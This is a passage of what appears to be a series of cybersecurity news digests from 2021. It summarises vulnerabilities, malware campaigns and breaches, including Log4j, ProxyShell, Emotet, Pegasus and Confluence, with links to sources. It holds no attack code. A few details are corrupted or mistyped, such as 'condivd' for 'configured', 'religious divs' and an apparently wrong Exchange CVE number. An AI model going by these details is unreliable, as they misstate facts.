another vulnerability fixed in the November bulletin, CVE-2021-42278 CVSSv3 in 8.8, it would allow attackers to achieve domain administrator rights in any Active Directory environment. The exploit chain is extremely easy to exploit, allowing adversaries to escalate privileges even without access to the underlying standard user account. An update is available for all supported operating systems. In any case, the mitigation is to patch the affected domain controllers by implementing Microsoft's 11/14/2021 patch (KB5008602) which fixes the CAP confusion issue, as well as the S4U2self issue created by the previous patch (KB5008380). However, some sources mention that the KB5008602 patch is only effective on Windows Server 2019 so it is recommended to consult the following guide in order to mitigate the issue on other product versions. There is currently no known active exploitation of these flaws, but we do note that there is a post explaining how this problem could be exploited, as well as a tool on Github that scans and exploits these vulnerabilities. Additionally, comments are beginning to be made on social networks about the possible combination of these flaws with the critical Log4j vulnerability. Know more: https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html Vulnerabilities in Lenovo devices Security researchers at NCC Group have discovered two new vulnerabilities in the IMController component found in multiple Lenovo devices, including Yoga and ThinkPad laptops, which would affect all versions of Lenovo System Interface Foundation prior to 1.1.20.3. Lenovo System Interface Foundation is a system that runs with SYSTEM privileges and helps Lenovo devices communicate with universal applications, providing the user with functions such as system optimisation and driver updates, among others. If disabled, Lenovo applications would no longer function properly. The newly identified vulnerabilities (CVE-2021-3922 / 3969 CVSSv3 7.1) could allow a malicious user to execute commands with administrator privileges. The first one is a race condition vulnerability that would allow interacting with the secondary process "Pipe" of IMController. The second is a TOCTOU (time-of-check to time-of-use) flaw that, if exploited, could allow privilege escalation on the vulnerable device. NCC Group alerted Lenovo to both bugs last October, and finally issued updates on 14 December that fixed both bugs, so it is recommended that IMController be updated to version 1.1.20.3. More information: https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/

Catalan government suffers DDoS attack According to the statement issued by the Catalan government, the Centre de Telecomunicacions i Tecnologies de la Informació (CTTI) detected last Friday a cyber-attack that compromised more than 2,000 of the organization’s computer applications for approximately 3 hours. The attack suffered was a denial-of-service (DDoS) attack, which consists of the collapse of services by increasing the volume of traffic so that the servers increase their processing time. Regarding the origin of the attack, the Generalitat has indicated that initial investigations indicate that it could be an attack contracted through the dark web, although at the moment there is no confirmation of this. Several websites and services dependent on the Generalitat, such as La Meva Salut, were affected, and other services such as Catalan television, TV3 and Catalunya Ràdio also experienced technical problems. Eventually, within a period of no more than three hours, the situation was under control and normality was restored, as the organization itself has already assured. More: https://govern.cat/salapremsa/notes-premsa/416324/nota Emotet: new campaigns using Trickbot and Cobalt Strike in their infections Researchers at CheckPoint have published an analysis of the resurgence of Emotet. According to the researchers, these new campaigns have seen the use of Trickbot as an entry vector, one of the most widely used botnets, which in recent months has infected up to 140,000 victims worldwide, with more than 200 campaigns and thousands of IP addresses on compromised devices. Trickbot, like Emotet, is commonly used to distribute ransomware, such as Ryuk or Conti. CheckPoint analyses these new campaigns where it has been observed that Trickbot is distributing Emotet. They point out that it has improved its capabilities with new tools such as: the use of elliptic curve cryptography instead of RSA, improvements in its control flow flattening methods or adding to the initial infection the use of malicious Windows application installation packages that mimic legitimate software. On the other hand, it is worth noting that Cryptolaemus researchers have reported that in some cases Emotet would be directly installing Cobalt Strike on compromised devices, which would speed up the infection process giving immediate access to lateral movement, data theft or ransomware distribution. Learn more: https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ RCE vulnerability in Windows 10 and 11 Security researchers at Positive Security have discovered a remote code execution drive-by vulnerability in Windows 10 and 11. This flaw occurs through Internet Explorer 11/Edge Legacy, the default browser on most Windows devices, and is triggered through an argument injection into the Windows default handler URI ms-officececmd. An attacker could exploit this vulnerability via a malicious website that allows a redirect to a URI created by ms-officecmd. It should be noted that Microsoft Teams must be installed on the system for the exploit to work. Following Positive Security's report of the flaw in March, Microsoft initially dismissed it and upon appeal by the researchers, classified it as critical. In August, Microsoft partially fixed the bug, still allowing argument injection. All the info: https://positive.security/blog/ms-officecmd-rce 0-day vulnerability in Apache Log4j A PoC has been published for a 0-day vulnerability, recently assigned as CVE-2021-44228, for code execution in Apache Log4j, an open-source library developed in Java that allows software developers to save and write log messages that is used in multiple applications by companies around the world. This flaw would allow malicious code to be executed on application servers or clients, one of the most prominent being those running Java versions of the Minecraft video game, manipulating log messages and even messages entered the game's own chat. According to LunaSec researchers, Java versions higher than 6u211, 7u201, 8u191 and 11.0.1 are not affected by this attack vector. Furthermore, LunaSec indicates that Steam and Apple iCloud cloud services have also been affected. Lastly, it should be noted that the versions of apache log4j affected are 2.0 to 2.14.1, with this security flaw being corrected in version 2.15.0. All the details: https://www.lunasec.io/docs/blog/log4j-zero-day/ Analysis of Russian state actor Nobelium Researchers at Mandiant have published an article detailing operations carried out by Nobelium, an actor associated with the Russian Foreign Intelligence Service (SVR). Mandiant reports that the tactics employed by the group to gain initial access to the victim's infrastructure include: the use of credentials compromised in previous malware campaigns where the CRYPTBOT stealer was used, compromise of cloud service providers (CSPs) and abuse of push notifications (MFA). Once the first access is gained, the actor attempts to gain persistence and escalate privileges by using the RDP protocol, employing WMI and PowerShell to distribute the BEACON backdoor on the victim's network. This backdoor was later used to install a new tool they have named CEELOADER, a downloader that communicates via HTTP with Nobelium's C2, and which distributes Cobalt Strike. In addition, Mandiant highlights the use of residential IP proxy services to authenticate themselves in the victim's systems and the use of compromised WordPress where they host the payloads that will lead to the second stage of the infection chain. Likewise, the French National Cybersecurity Agency (ANSSI) has issued a statement specifying that since last February multiple campaigns against French organizations originating from the Russian actor have been detected. Más info: https://www.mandiant.com/resources/russian-targeting-gov-business

Reacharound: possible resurgence of the triple threat Trickbot-Emotet-Ransomware Last January, an international action orchestrated by Europol and Eurojust led to the dismantling of the Emotet infrastructure, a malware widely used in the early stages of the ransomware infection chain. These events contributed, according to security researchers, to the shutdown of multiple high-level ransomware-as-a-service (RaaS) operations. However, since last week there have been reports of a resurgence of the threat from researchers such as GData and AdvIntel, who have indicated that operators of the Conti ransomware have allegedly convinced the former Emotet operator to rebuild its infrastructure. These actions were allegedly carried out through a campaign named "Reacharound", which is characterised by the infection of devices with TrickBot, which included an Emotet payload. According to AdvIntel researchers, they estimate that the return of this threat will have a significant impact on ransomware operations due to three reasons: the high sophistication of Emotet's capabilities, the promotion of crime-as-service in this area and the return of the classic TrickBot-Emotet-Ransomware triple threat. More: https://securityaffairs.co/wordpress/124807/cyber-crime/trickbot-emotet-conti-triad.html PoC published for a vulnerability in Microsoft Exchange Security researcher @testanull, has published a working proof of concept (PoC) for the vulnerability identified as CVE-2021-4231 and CVSS of 8.8, which would be affecting Microsoft Exchange, which was fixed by Microsoft in the last November Security Bulletin. The vulnerability is said to affect Exchange Server 2016 and 2019 on-premises services and could allow an authenticated attacker to execute arbitrary code remotely. Microsoft reports that they have detected activity related to the exploitation of this vulnerability occasionally in targeted attacks, so they recommend its correction. It should be noted that this would not be the first time in 2021 that vulnerabilities in the Microsoft Exchange service have been exploited to carry out attacks, as attempts to exploit ProxyLogon and ProxyShell are well known. It is recommended to make use of the Exchange diagnostic program to check the possible involvement of these vulnerabilities. All the details: https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169 New Windows 0-day with public exploit Security researcher Abdelhamid Naceri has made public an exploit for a new 0-day in Windows that would allow an attacker to gain administrator privileges and affects all versions of Windows, including Windows 10, Windows 11 and Windows Server 2022. Naceri managed to bypass the patch that Microsoft included in its November monthly bulletin for an escalation of privilege vulnerability in Windows Installer (CVE-2021-41379), a vulnerability that he reported to Microsoft. Following this new discovery, he was able to identify a new 0-day for which the researcher has now decided to publish the exploit (InstallerFileTakeOver) on his GitHub account. With the publication of this exploit, Naceri intends to join the feeling of discontent already shown by other researchers with Microsoft, for what they claim would be a continuous degradation of the bounties that are reported to the firm. Microsoft is expected to patch the new bug in its next bulletin. The researcher recommends waiting for the official fix given the complexity of the vulnerability. Cisco Talos security researchers have reportedly already detected malware samples that are trying to exploit the new 0-day. Researchers have indicated that the exploitation attempts observed are part of low-volume attacks, so they could be tests to make adjustments to the exploits and can therefore be understood as a possible preliminary step before larger-scale campaigns. More information: https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/ Security breach at GoDaddy Domain registrar GoDaddy has made public a security incident detected on November 17th, in which an unauthorised third party allegedly gained access to the company's Managed WordPress hosting environment via a compromised password. The investigation, which is still ongoing, determines that the attacker had access to customer information from the 6th of September of this year until the time of its detection, which was blocked and expelled from the system. Among the information exposed is email address and customer number of 1.2 million active and inactive Managed WordPress users, the WordPress administrator password set at the time of provisioning, sFTP and database usernames and passwords of active users, and the private key of SSL certificates for certain active users. The company is contacting customers affected by this security breach. It is worth noting that GoDaddy suffered a data breach in May last year. Learn more: https://www.sec.gov/Archives/edgar/data/1609711/000160971121000122/gddyblogpostnov222021.htm Vulnerabilities in MediaTek allow spying on Android devices Semiconductor company MediaTek has fixed several security flaws that could have allowed attackers to eavesdrop on phone calls from Android devices, execute commands or escalate privileges. MediaTek's SoCs (System on a chip) are embedded in around 37% of the world's smartphones and IoT devices, including devices from brands such as Xiaomi, Realme and Vivo, among others. Three of these vulnerabilities (CVE-2021-0661, CVE-2021-0662 and CVE-2021-0663) are due to incorrect boundary checking and were fixed in MediaTek's security bulletin last October, all with CVSS of 6.7. The fourth vulnerability is assigned the identifier CVE-2021-0673 but has not yet been fixed. The company will publish more details about the flaw, as well as its fix, in the next security bulletin to be published in December. More: https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp/

Trojan Source: vulnerability in source code compilers Researchers at the University of Cambridge have published a paper detailing a new attack method called "Trojan Source" that exploits a flaw in most existing source code compilers and software development environments. The method exploits features of text encoding standards such as Unicode, making modifications that generate vulnerabilities in the source code that would go unnoticed by a human and could be implemented in major programming languages such as C, C++, C#, JavaScript, Java, Rust, Go and Python. As a result, such an attack would lead to a compromise of the software supply chain. In addition, the research warns that vulnerabilities introduced in source code persist in the copy and paste functions of most modern browsers, editors and operating systems, meaning that any developer copying code from an untrusted source into a protected code base could inadvertently introduce "invisible" vulnerabilities into a system. The researchers have already shared these findings with 19 organisations involved, many of which are already developing updates to address the problem in code compilers, interpreters, code editors and repositories (e.g., Rust has catalogued it with the identifier CVE-2021-42574). There are also several proof-of-concepts that simulate attacks in the programming languages described. All information: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/146100_trojan-source.pdf BlackMatter announces operational shutdown under pressure from authorities Threat actors linked to the BlackMatter ransomware have announced the shutdown of operations due to pressure from local authorities. Researchers from the VX-Underground platform have released a screenshot of the statement, posted on the private RaaS (Ransomware-as-a-service) website where operators communicate and offer their services to affiliates. Originally written in Russian, the translation of the message states that BlackMatter's infrastructure will be shut down in the next 48 hours, although they open the possibility of continuing to provide affiliates with the necessary decryptors to continue their extortion operations. Some media reports suggest that the group's motivation comes in response to the recent publication of reports by Microsoft and Gemini Advisory linking the FIN7 group (believed to be the creators of BlackMatter) to a public company Bastion Secure, as well as an increase in arrests of individuals belonging to other ransomware groups. More: https://twitter.com/vxunderground/status/1455750066560544769 Mekotio banking trojan is back with an improved campaign Checkpoint researchers have detected a new campaign of the Mekotio banking trojan with more than a hundred attacks in recent weeks via phishing emails containing malicious links or zip file attachments. According to researchers, this new wave of attacks started following the operation carried out by the Spanish Guardia Civil last July which led to the arrest of 16 people involved in the distribution of this malware. However, current indications point to Brazil as the command centre of Mekotio's operators, while maintaining some collaboration from Spain. Mekotio's main objective is the theft of banking credentials from Spanish-speaking users, and its current version brings with it striking new features in its attack flow, as its developers have achieved greater stealth and concealment when implementing its techniques. Apart from having more layers of obfuscation, the zip attached to phishing emails contains a script with location and analysis capabilities that allow it to discriminate victims based on their nationality or even detect if the malware is running from a virtual machine, allowing the threat actor to evade detection and therefore successfully deploy the malware. All details: https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/ Threat actor Tortilla campaign distributing Babuk ransomware Cisco Talos security researchers have identified an active campaign aimed at deploying Babuk ransomware by exploiting Microsoft Exchange servers vulnerable to ProxyShell and PetitPotam. This campaign is reportedly run by the threat actor known as Tortilla, a group that has been active since July 2021 and primarily targets organisations located in the United States, as well as the United Kingdom, Germany, Ukraine, Finland, Brazil, Honduras and Thailand to a lesser extent. The infection process usually starts with a downloader in DLL or EXE format, which will execute an obfuscated PowerShell command and download the final Babuk ransomware payload by inserting it into a new ad-hoc process (AddInProcess32). Additionally, researchers have also observed the presence of the webshell China Chopper on multiple infected systems; as well as the attempted exploitation of other vulnerabilities in Atlassian, Apache Struts, Oracle WebLogic, or WordPress. More details: https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html

Microsoft Security Bulletin Microsoft has published its security bulletin for the month of October in which it has fixed a total of 81 bugs in its software, including 4 0-day vulnerabilities. Out of the 81 bugs, 3 have been categorised as critical severity. The first 0-day, categorised as CVE-2021-40449 and with a CVSS of 7.8, is an elevation of privilege flaw that has been exploited to carry out attacks in campaigns against IT companies, military and diplomatic entities. The second 0-day (CVE-2021-40469 and CVSS of 7.2) is a remote code execution vulnerability in Windows DNS Server. The third (CVE-2021-41335 and CVSS of 7.8) is an elevation of privilege bug in the Windows kernel. The last one, classified as CVE-2021-41338 and with CVSS of 5.5, is a security evasion vulnerability in Windows AppContainer Firewall. On the other hand, the 3 fixed critical severity bugs correspond to remote code execution vulnerabilities, two of them in Windows Hyper-V (CVE-2021-38672 and CVE-2021-40461) and the remaining one (CVE-2021-40486) in Microsoft Word. It is recommended to apply the security updates as soon as possible. More info: https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct Vulnerability in OpenSea NFT platforms allows cryptocurrency wallets to be stolen Check Point researchers have detected that malicious actors could empty cryptocurrency wallets through malicious NFT platforms on OpenSea, one of the largest digital marketplaces for buying and selling crypto assets. This platform, active since 2018, has a total of 24 million NFT (non-fungible tokens), reaching a volume of up to $3.4 billion in August 2021 alone. The attack method used consists of creating an NFT in which the threat actor includes a malicious payload and then distributes it to victims. Several users reported that their wallets were emptied after receiving supposed gifts on the OpenSea marketplace, a marketing tactic known as "airdropping" used to promote new virtual assets. CheckPoint identified that the platform allows the uploading of files with multiple extensions (JPG, PNG, GIF, SVG, MP4, WEBM, MP3, WAV, OGG, GLB, GLTF), so they ran a test to reproduce the attack scenario, uploading an SVG with a malicious payload used to get the wallets of potential victims emptied. The reported bugs have now been fixed. All the details: https://research.checkpoint.com/2021/check-point-research-prevents-theft-of-crypto-wallets-on-opensea-the-worlds-largest-nft-marketplace/ Cyber-attacks against water treatment systems The US Cybersecurity and Infrastructure Agency (CISA) has issued a new alert concerning cyber-attacks against drinking water and wastewater processing facilities. The activity observed includes attempts to compromise the integrity of systems through unauthorised access by both known and unknown threat actors. The advisory also points to known weaknesses in entities in this sector such as their susceptibility to spear-phishing attacks, the exploitation of outdated and unsupported software and control systems, as well as the exploitation of remote access systems. Over the course of 2021, there have been several relevant incidents that would fit into this scheme, such as the identification in August of ransomware samples belonging to the Ghost and ZuCaNo families in the SCADA systems of plants in California, Nevada and Maine. Similarly, it is worth recalling the incident that occurred in February at a water treatment plant in Florida where a threat actor managed to modify the volumes of chemicals poured into drinking water tanks. Learn more: https://us-cert.cisa.gov/ncas/alerts/aa21-287a Google warnings for government-backed attacks increase by 33% Google's Threat Analysis Group (TAG) team has published information on the number of warnings generated by its "Security warnings for suspected state-sponsored attacks" alert system launched in 2012. In the course of 2021, the system sent more than 50,000 warnings to users, an increase of 33% compared to the same period in 2020. According to Google, this service monitors more than 270 attacker groups in 50 different countries, generating warnings when it detects phishing attempts, malware distribution or brute force attacks originating from the infrastructure of government-backed threat actors known as Privateers. During 2021, Google highlights two threat actors that stand out above the rest, based on the impact of their campaigns targeting activists, journalists, government officials or workers in national security structures, identified as APT28 o "Fancy Bear" with the support of Russia and APT35 or "Charming Kitten", an Iranian threat actor active since at least 2014. In addition, the publication points out that receiving such an alert means that the account is considered a "target" and does not necessarily mean that it has been compromised, so users are encouraged to sign up for this service or otherwise enable two-factor authentication on their accounts. All the info: https://blog.google/threat-analysis-group/countering-threats-iran/ TrickBot Gang duplicates and diversifies infection efforts IBM researchers have tracked the activity of the ITG23 group, also known as the TrickBot Gang and Wizard Spider, after observing an increase in the expansion of distribution channels used to infect organisations and businesses with Trickbot and BazarLoader, samples used to orchestrate targeted ransomware and extortion attacks. IBM's analysis suggests that this increase may have contributed to the spike in Conti ransomware activity reported by CISA last September. Researchers have also associated ITG23 with two groups affiliated with malware distribution, Hive0106 (also known as TA551) and Hive0107. These are characterised by attacks aimed at infecting corporate networks with malware, using techniques such as email thread hijacking, the use of fake customer support response forms, as well as the use of undeground call centres employed in BazarCall campaigns. These TTPs are reportedly leading to an increase in infection attempts by these groups. More: https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

Malware campaign using TeamViewer on websites under IIS Malwarebytes researchers have observed a malware distribution campaign since the beginning of September that makes use of previously compromised pages running on Microsoft's Internet Information Services (IIS) web server. The attack vector consists of displaying a fake expired certificate alert such as "Detected a potential security risk and has not extended the transition to [sitename]. Updating a security certificate may allow this connection to succeed. NET::ERR_CERT_OUT_OF_DATE." which, in turn, suggests the user to download a malicious "update installer" that actually obfuscates the known TVRAT trojan. Once the victim executes the malware it will install itself alongside the TeamViewer remote control software, giving the threat actor direct communication with its command and control server and full control over the compromised computer. So far, the specific methods used to compromise IIS servers are not known exactly, although different exploit codes are available and were patched by Microsoft itself last May (CVE-2021-31166). More info: https://www.bleepingcomputer.com/news/security/hacked-sites-push-teamviewer-using-fake-expired-certificate-alert/ BulletProofLink: massive phishing campaign Microsoft security researchers have published details of a massive phishing-as-a-service (PHaaS) campaign that uses a hosting-like infrastructure and offers different services to threat actors, such as phishing kits and templates. According to research, BulletProofLink, as this campaign is called, goes beyond traditional phishing kits, because after an initial registration on its portal for a fee of $800, it offers a comprehensive service with hosting, domain generation, email sending, credential collection and stolen logins, which can then evolve with modifications to phishing templates from among the more than 120 available. However, Microsoft has already warned that BulletProofLink's operators trick their own customers by storing the stolen credentials from the attacks and then selling them on other underground forums. It is estimated that the campaign has used more than 300K unique newly created subdomains to date, which is evidence of the scale of the impact of this campaign. All the details: https://www.microsoft.com/security/blog/2021/09/21/catching-the-big-fish-analyzing-a-large-scale-phishing-as-a-service-operation/ Microsoft Exchange Autodiscover bug allows exfiltration of credentials Amiter Serper, security engineer at Guardicore, has discovered a new bug implementation in Autodiscover Microsoft Exchange protocol which could allow credential exfiltration. Autodiscover is a protocol that Microsoft Exchange uses to provide their customers an easy and automatic way to condiv the Exchange client and its different applications such as Outlook. Once the client is installed, it requests the username and password and then tries to use Autodiscover in order to build different URLs based on the user email. In case of none of these autogenerate URLs respond, a back-off phase is initiated that tends to fail because it tries to resolve the Autodiscover.TLD part. Serper seeing that whoever owns this Autodiscover.TLD domain would receive all requests that do not reach the original domain. To try the bug, Serper and his team purchased different Autodiscover domains with different TLDs, receiving requests from many customers from multiple industries. After testing, Guardicore reportedly obtained more than 90,000 unique credentials from different applications such as Outlook and more than 350,000 Windows domain credentials, determining that the impact is global. Learn more: https://www.guardicore.com/labs/autodiscovering-the-great-leak/ New 0-day vulnerability in Apple exploited on iOS and macOS devices Google security researchers have reported to Apple a new 0-day vulnerability affecting iOS and macOS devices. Also, Apple itself has acknowledged that this flaw may be being actively exploited on the network by threat actors. Specifically, the vulnerability is located in the kernel of the XNU operating system, which has been registered under CVE-2021-30869 and for the moment has not been assigned its criticality under the CVSSv3 scale. However, it should be noted that this is a "type confusion" type bug that can lead to the execution of arbitrary code on a compromised device, so its criticality in any case is considered high. It should be noted that during this year 2021 alone, Apple has already had to resolve more than 10 0-day vulnerabilities. In this case, the corresponding patches that solve the problem are already available for the following affected devices: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, iPod touch (6th generation) with iOS 12.5.5 and Mac with security update 2021-006 Catalina. Full info: https://support.apple.com/en-us/HT212824

PoC available and scans detected for RCE in Confluence On Wednesday 25 August, Confluence published a security advisory to warn of a vulnerability in Confluence Server and Data Center in versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. In the advisory, the firm clarified that the flaw did not affect Confluence Cloud customers. The vulnerability, which has been given the identifier CVE-2021-26084 and a CVSS of 9.8, is specifically an OGNL (Object-Graph Navigation Language) injection vulnerability that would allow an authenticated user, and in some cases even an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. Just a few days later, on Sunday 29 August, some security researchers announced that they had managed to execute code remotely without authentication in a relatively simple way, but they had not yet made the details of the PoC public, which they delayed for a few days until yesterday, September 1st. Although the PoC was not initially made public, on August 31st, the detection of mass scans of vulnerable Confluence servers was already beginning to be reported. More: https://therecord.media/confluence-enterprise-servers-targeted-with-recent-vulnerability/ ChaosDB - Critical vulnerability in Microsoft Azure Cosmos DB Security researchers from Wiz have discovered a critical vulnerability in Azure, Microsoft's Cloud platform, that allows the complete remote takeover of Cosmos DB accounts with admin privileges. Due to the severity of this flaw, the researchers have not published all its technical details and the means to exploit it. However, they have confirmed that #ChaosDB is triggered by the chained exploitation of a series of vulnerabilities in the Jupyter Notebook function of Cosmos DB. By exploiting these flaws, a threat agent could obtain credentials from the targeted Cosmos DB, Jupyter Notebook and Jupyter Notebook Storage accounts. With said credentials, the attacker will be able to see, modify and erase data from the Cosmos DB accounts. In the article, Wiz has posted a video showing the exploitation chain. Microsoft patched its flaw on August 12th, less than 48 hours after being warned by Wiz, but it took some days until they sent a warning on August 26th to 30% of Cosmos DB users. In this warning, Microsoft informed that there was no evidence that the vulnerability was being exploited, but urged users to reset primary keys as security measure. Meanwhile, Wiz has indicated that the number of potentially affected clients could be bigger that the one assessed by Microsoft and has recommended all users to undertake all security measures necessary. All the details: https://chaosdb.wiz.io/ ProxyToken - New Microsoft Exchange vulnerability Security researchers at Zero Day Initiative have published technical details about a severe vulnerability in Microsoft Exchange Server called ProxyToken. The flaw, listed with the identifier CVE-2021-33766 and which has received a CVSSv3 of 7.3, is specifically an information disclosure vulnerability that could reveal victims' personal information or sensitive company data, among other things. Microsoft Exchange uses two websites: the front-end, which users connect to access email, and which largely functions as a proxy for the back end, to which it passes authentication requests. The currently identified problem lies in a function called DelegatedAuthModule, where the front-end bypasses authentication requests, which contain a SecurityToken cookie that identifies them directly to the back end. When the front-end receives an authentication request with the SecurityToken cookie, it knows that the back end is solely responsible for authenticating this request. However, the back end is completely unaware that it needs to authenticate some incoming requests based on the SecurityToken cookie, since DelegatedAuthModule is not loaded on installations that have not been condivd to use the special delegated authentication feature. The result is that requests can pass through, without being subjected to authentication on the front-end or back-end. Microsoft addressed the issue as part of its July updates and recommends that all Exchange server administrators who have not installed the appropriate patches prioritise this task. Learn more: https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server BrakTooth: vulnerabilities affecting Bluetooth devices The ASSET research team has published a total of 16 security advisories, addressing 20 vulnerabilities affecting the Bluetooth software stack on System-on-Chip (SoC) boards from eleven different suppliers. It is estimated that billions of devices are affected, including mobile devices, computers, tablets, etc. According to the researchers, exploiting these security flaws could allow denial-of-service attacks or the execution of malicious code, although the impact would differ depending on the SoC board model and Bluetooth software stack used. The vulnerabilities identified include CVE-2021-28139, which allows remote code execution on devices with ESP32 SoC boards from Espressif Systems via Bluetooth LMP packets. So far, only three of the affected suppliers have released patches: Espressif Systems, Infineon and Bluetrum. Others, such as Intel, continue to work on this issue, and some, such as Texas Instruments, have indicated that they will not address the issue, while Qualcomm will only work on a part of the issue. Info: https://asset-group.github.io/disclosures/braktooth/

Exploitation of vulnerabilities in Exchange ProxyShell Security researcher Kevin Beaumont has analyzed the recent massive exploitation of Microsoft Exchange Server vulnerabilities known as ProxyShell. These are a set of flaws revealed by Orange Tsai during the BlackHat conferences that comprise the following vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. In his publication, Beaumont explains how to identify potentially affected systems as well as urges security teams to patch the flaws as soon as possible. This is because, as revealed by Symantec, the LockFile ransomware team has been taking advantage of these vulnerabilities to access networks from victims and to use the PetitPotam vulnerability, yet to be fully patched, to access the domain controller and then, to spread through the networks. So far, at least 10 companies affected by this campaign have been identified, mainly located in the US and Asia. Given the circumstances, CISA has published guidelines to identify affected systems and possible mitigations. The Microsoft Exchange team has published a new warning updating last week's information on the set of vulnerabilities known as ProxyShell. The reason behind this new publication is to confirm that Exchange servers are protected if the Microsoft Monthly patches for May and July are installed. Plus, the team recommends to keep this type of software constantly updated. Within the article a series of guidelines are included that allow teams to identify vulnerable Exchange Servers. Moreover, researchers from Huntress have issued several updates on the post where they have been analyzing these vulnerabilities to inform about the detection of over 140 webshells that have been already installed in vulnerable servers belonging to companies from various sectors. According to the researchers, some of the dates in which configuration was tampered date back to March, April, June and July, which means that there could be a connection with ProxyLogon. All the details: https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c Realtek vulnerabilities exploited to distribute malware In mid-August, four vulnerabilities were disclosed by IoT Inspector Research Lab in a software SDK distributed as part of Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors. Among the four issues discovered, the critical vulnerability classified as CVE-2021-35395 received the highest severity rating of 9.8 CVSSv3. Effective exploitation of these bugs could allow unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Although Realtek released patches a day before IoT Inspector published its findings, researchers at Seamless Network have detected attempts to exploit these vulnerabilities to propagate a variant of the Mirai malware. Furthermore, and according to Seamless Network's scans, the most common device models currently running the vulnerable Realtek SDK are: Netis E1+ extender, Edimax N150 and N300 Wi-Fi router, Repotec RP-WR5444 router, recommending owners of such devices to look or inquire their sellers for new firmware patches. Learn more: https://securingsam.com/realtek-vulnerabilities-weaponized/ 38 million records exposed due to Microsoft Power Apps misconfiguration The UpGuard team has published a report about a misconfiguration in Microsoft Power Apps, which would have resulted in the exposure of more than 38 million personal data records. Microsoft Power Apps allows companies and institutions to create custom applications and can enable the OData (open data protocol) API to retrieve user data from Power Apps lists. On May 24, UpGuard detected that lists with Power Apps data could be anonymously accessed via the OData API, due to the fact that accesses are not limited by default. The investigation discovered thousands of lists accessible on hundreds of portals, including private companies and public administrations, with a variety of data ranging from emails, vaccination appointments, first and last names, phone numbers, or social security numbers. Microsoft has changed the default settings to address the problem and has contacted affected customers, as has UpGuard, which has alerted 47 affected entities. Full info: https://www.upguard.com/breaches/power-apps New iPhone exploit used to deploy Pegasus spyware Researchers at Citizen Lab have detected a new zero-click iMessage exploit, called FORCEDENTRY, that was used to deploy NSO Group's Pegasus spyware. FORCEDENTRY was used to target the devices of at least nine Bahraini activists, including members of the Bahrain Center for Human Rights, Waad, Al Wefaq, between June 2020 and February 2021. At least four of the activists are believed to have been compromised by LULU, a Pegasus operator attributed with high confidence to the government of Bahrain. Furthermore, it points out that one of the hacked activists, was living in London at the time of the compromise, making this the first documented compromise made by the Bahraini government of a device that was used by an activist in Europe. The Citizen Lab report also states that some of the activists’ phones suffered zero-click iMessage attacks that, besides FORCEDENTRY, also included the 2020 KISMET exploit. Experts recommend disabling iMessage and FaceTime to prevent attacks mentioned in the report, anyway, powerful spyware like the one developed by NSO group has many other exploits in their arsenal. More: https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/ Vulnerability in Kalay protocol affects millions of IoT devices Researchers at Mandiant have discovered, in coordination with the Cybersecurity and Infrastructure Security Agency (CISA), a vulnerability in IoT devices using the Kalay network protocol from the manufacturer ThroughTek. The vulnerability, classified as CVE-2021-28372, allows unauthorised remote connection to the devices by an attacker, thus compromising their integrity and allowing audio eavesdropping, real-time video viewing and even the compromise of device credentials. The manufacturer has so far been unable to determine the number of affected devices due to the way the protocol is integrated into the products' software, although it is estimated that there are at least 85 million active devices using this protocol. Versions prior to 3.1.10 and 3.4.2.0 are affected by this vulnerability. All the details: https://www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html

Global cyber-espionage investigation published A joint consortium of organizations and media outlets has published an investigation revealing the indiscriminate marketing and use of Pegasus spyware. According to the investigators, a data leak has identified at least 10 governments as potential customers of the Israeli company NSO Group, which owns Pegasus. The leak contains a list of more than 50,000 phone numbers of "persons of interest" from 2016. Identified victims reportedly include corporate executives, religious divs, academics, NGO employees, trade union leaders and members of several governments. Pegasus' functionalities include targeting iOS or Android devices in order to exfiltrate messages, emails, photos, record calls and activate microphones. Both the company and some of the states involved have denied its use for such purposes. It is worth noting that this spyware was allegedly used last year to infect Jeff Bezos' device. Since the publication, news and reactions have continued to emerge. On the one hand, Amazon Web Services has reported the closing of infrastructure and accounts linked to the company NSO Group, owner of Pegasus, after it became public that the company had used AWS infrastructure to carry out espionage tasks. In addition, Apple's share price fell yesterday following news of the active exploitation of multiple 0-days on an iPhone 12 upgraded to the latest iOS 14.6 operating system. It is also worth noting that the United Nations Office in Geneva has tweeted a reminder to countries that all surveillance measures must be carried out under justified and narrowly defined circumstances, with a legitimate aim, and be proportional to that aim. All the details: https://amp.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus Malware distribution campaign targeting Spanish-speaking corporate users Proofpoint's team has identified a new threat group, named TA2721, that is distributing malware via emails in Spanish. This group is targeting users with Spanish surnames who belong to global organizations in different industries. As these are specific targets, researchers raise the possibility that the group performs some kind of reconnaissance of the targeted entities before sending the fraudulent emails. The TA2721 infection chain is characterized by the use of PDF documents attached to the emails, which contain a URL that redirects to the download of an encrypted and compressed .RAR file that eventually installs the Bandook malware on the victim's computer, an old RAT-type malware that is not very common. Researchers have found that this threat actor 